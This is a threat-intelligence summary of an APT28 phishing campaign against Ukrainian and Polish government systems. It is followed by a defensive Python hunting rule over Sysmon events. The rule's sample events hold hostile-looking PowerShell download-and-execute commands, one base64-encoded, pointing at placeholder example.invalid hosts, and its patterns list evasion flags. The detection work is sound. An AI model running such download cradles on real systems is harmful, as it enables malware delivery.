APT28's End-of-Year Cyber Onslaught Takes Aim at Ukrainian and Polish Government Systems
CERT-UA warns of a phishing campaign by the Russian state-sponsored group APT28 that delivered malware to Ukrainian government systems. The campaign ran from December 15 to 25, 2023, distributing phishing emails to Ukrainian government organizations; CERT-UA notes that "cases of similar attacks have also been recorded in relation to Polish organizations." The emails led victims to malicious websites that served a shortcut file, and opening it started an infection chain driven by PowerShell. The resulting malware, MASEPIE, fetched further tooling: STEELHOOK, which steals data from web browsers, and OCEANMAP, a C# backdoor used to execute commands. Together with IMPACKET and SMBEXEC for network reconnaissance and lateral movement, these let the operators move rapidly through compromised networks. Based on the tactics, techniques, and procedures (TTPs) observed, CERT-UA attributes the activity to APT28.
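The chain above (user opens a downloaded shortcut, PowerShell runs and pulls the next stage) is one a defender can hunt for in endpoint telemetry without any campaign-specific indicator. The following is an added example written for this page, not CERT-UA's detection content or anything published by the article's author: a small scoring rule over Sysmon Event ID 1 (process creation) records that flags PowerShell launched from a user's Explorer or cmd.exe session whose command line, after decoding any `-EncodedCommand` payload, contains download or execution primitives. The field names (Image, ParentImage, CommandLine, User, ProcessGuid) are Sysmon's; the events, hostnames and GUIDs are constructed for the example, the `example.invalid` URLs are placeholders, and the regexes and threshold are assumptions a team would tune to its own baseline.

```python
"""Added hunting example (not CERT-UA's or the article's own detection content).
Flags PowerShell started from a user's Explorer or cmd.exe session, which is
what a double-clicked .lnk produces, when its command line (including a decoded
-EncodedCommand payload) carries download or execution primitives.
All events below are constructed; no real campaign indicators are used."""
import base64
import re

# Parents through which a user-opened shortcut typically launches PowerShell
# (explorer.exe directly, or cmd.exe when the .lnk target is "cmd /c powershell ...").
USER_SHELL_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Assumed indicator lists; tune to your environment.
DOWNLOAD_PRIMITIVES = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|Start-BitsTransfer", re.I)
EVASION_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|"
    r"-nop\b|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I)
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> str:
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; return the
    decoded script, or '' when there is none or it is malformed."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one Sysmon Event ID 1 style record.
    Evasion flags add 1 each; a download/execution primitive adds 2."""
    if ev.get("EventID") != 1:
        return 0, []
    if basename(ev.get("Image", "")) not in POWERSHELL_IMAGES:
        return 0, []
    if basename(ev.get("ParentImage", "")) not in USER_SHELL_PARENTS:
        return 0, []
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    for m in EVASION_FLAGS.finditer(cmd):
        score += 1
        reasons.append("evasion flag: " + m.group(0).split()[0])
    # Scan the visible command line and the decoded payload together so an
    # encoded stager does not hide its download primitive.
    searchable = cmd + "\n" + decode_encoded_command(cmd)
    m = DOWNLOAD_PRIMITIVES.search(searchable)
    if m:
        score += 2
        reasons.append("download/execution primitive: " + m.group(0))
    return score, reasons


def hunt(events, threshold: int = 2) -> list[dict]:
    """Return the records scoring at or above threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"ProcessGuid": ev.get("ProcessGuid"), "User": ev.get("User"),
                         "score": score, "reasons": reasons})
    return hits


# Constructed sample telemetry (not real events). e3 carries an encoded stager;
# e4 is service-launched and therefore outside this rule's scope.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{e1}", "User": "CORP\\alice",
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": PS + " -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/x','C:\\Users\\Public\\x.exe')\""},
    {"EventID": 1, "ProcessGuid": "{e2}", "User": "CORP\\bob",
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": PS + r" -NoProfile -File C:\Scripts\backup.ps1"},
    {"EventID": 1, "ProcessGuid": "{e3}", "User": "CORP\\carol",
     "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": PS + " -nop -w hidden -enc " + ENCODED},
    {"EventID": 1, "ProcessGuid": "{e4}", "User": "NT AUTHORITY\\SYSTEM",
     "Image": PS, "ParentImage": r"C:\Program Files\Agent\agent.exe",
     "CommandLine": PS + " -enc " + ENCODED},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Running it flags e1 and e3 and leaves bob's scheduled backup script and the SYSTEM-launched agent alone. The parent-process filter is where this rule is most likely to miss: a shortcut that chains through another living-off-the-land binary (wscript.exe, mshta.exe, conhost.exe) before PowerShell would need that parent added, and a campaign that drops a script file and runs it with `-File` rather than inline would show no download primitive on the command line at all, so pair this with script block logging (Event ID 4104) rather than relying on process creation alone.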